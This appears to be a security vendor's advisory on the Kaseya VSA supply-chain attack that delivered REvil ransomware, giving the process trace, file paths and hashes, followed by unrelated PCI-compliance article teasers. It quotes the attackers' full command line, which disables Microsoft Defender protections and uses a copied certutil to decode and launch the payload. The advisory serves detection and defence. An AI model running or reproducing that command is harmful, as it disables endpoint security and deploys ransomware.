/
/
Active Threat: Kaseya Software Supply Chain Attack

Active Threat: Kaseya Software Supply Chain Attack

Share

Active Threat – Happening Now

We are monitoring a Supply Chain attack outbreak utilizing REvil ransomware. At this time it appears to stem from a malicious Kaseya update. A malicious DLL containing the REvil Ransomware (C:\Windows\mpsvc.dll) is side-loaded into a legitimate older copy of Microsoft Defender (C:\Windows\MsMpEng.exe) to run the encryption from a legitimate-looking process.
Attack chain contains code that attempts to disable Microsoft Defender Real-Time Monitoring, Script Scanning, Controlled Folder Access, etc. via PowerShell.

Process Trace:

1. C:\windows\msmpeng.exe

2. C:\kworking\agent.exe
3. C:\Windows\SysWOW64\cmd.exe
4. (Listed Below)
5. AgentMon.exe

6. C:\Windows\System32\services.exe


“c:\windows\system32\cmd.exe”
/c ping 127 0 0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1 0 \powershell.exe set-mppreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess disabled -EnableNetworkProtection auditmode -Force $true -MAPSReporting disabled -SubmitSamplesConsent neversend & copy-item /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & Write-Output % random% >> c:\windows\cert.exe & c:\windows\cert.exe () -decode c:\kworking\agent.crt c:\kworking\agent.exe & remove-item /q $true /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe

The following command is run, which:
• Disables Real-Time Monitoring
• Disables IPS
• Disables Cloud Lookup
• Disables script scanning
• Disabled Controlled Folder Access (ransomware prevention feature)
• Disables Network Protection
• Stops cloud sample submission
Agent.crt is dropped by the Kaseya VSA. It is then decoded with certutil to carve out agent.exe. Inside agent.exe it has 2 files embedded, MsMpEng.exe and mpsvc.dll. The legitimate Windows Defender executable was used to side-load the REvil Ransomware

Hashes

agent.exe (dropper): d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
cert.exe: 605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c

We will update as more information become available.
To Read More About This Attack: https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/

Subscribe to Our Newsletter

ON WATCH, ALL THE TIME

Featured Articles

Point-to-Point Encryption (P2PE) in the payment card industry involves deploying a recognized solution by the PCI council, where hardware, processes, and technology undergo rigorous testing against the current P2PE Standard v3.1 or earlier versions. The P2PE standard combines a recognized and certified PTS device with software and encryption methods to allow cardholder data to be encrypted upon swipe and transmitted encrypted throughout the merchant environment until decrypted within a decryption environment, inaccessible to the merchant.
In today’s rapidly evolving cybersecurity landscape, achieving and maintaining PCI compliance is more critical than ever. With the latest update to PCI DSS 4.0.1, businesses must adapt to meet new standards designed to enhance security and flexibility. This updated PCI Compliance Checklist outlines the essential steps for staying compliant while optimizing your organization’s security posture.
As with many things in popular culture, the PCI Data Security Standard (PCI DSS) has many myths associated with it. The PCI DSS has existed for many years and despite the efforts of the PCI Security Standards Council (PCI SSC) and industry experts, many misconceptions and myths persist. Below we will cover some common PCI DSS myths vs. the reality.
The PCI DSS standard is largely responsible for dictating the way organizations all over the world approach cybersecurity and the protection of credit card data. As v4.0 of the standard approaches, organizations should aim to identify and plan updates for the aspects of their security and compliance programs that are most likely to be affected.
Employees of companies of all sizes are now either required to shelter in place or State and Government lock-downs are forcing companies to require their employees to work remotely. How will this impact your PCI-DSS Compliance?